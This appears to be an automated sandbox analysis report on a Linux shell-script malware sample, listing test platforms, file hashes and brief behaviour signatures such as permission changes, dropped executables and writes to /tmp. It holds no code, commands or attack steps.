Analysis
-
max time kernel
19s -
max time network
129s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240611-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
21/10/2024, 01:34
Static task
static1
Behavioral task
behavioral1
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089.sh
-
Size
10KB
-
MD5
87159c208c4802b4a091c9afdab0a149
-
SHA1
4a431fedf0d52d9e6f66216d506e9c9c8b992f5c
-
SHA256
344320dbf3dd990e25c739bfbfbc0e496a1e5b98698d0baf5ed4360d12ef8089
-
SHA512
753de5440287c2ca57ed60036c9e630dd86b64c1175e48f95bd64e1d646ed12a86163212d2be91e9c5dd44a440717dd41c11a8fdfd89991d74ba2ff9ac324cf0
-
SSDEEP
192:ETiaS/TRw4sFgAuWD+y+TiaS/TK4sFgAyG:ETiaS/TR9WDv+TiaS/TU
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97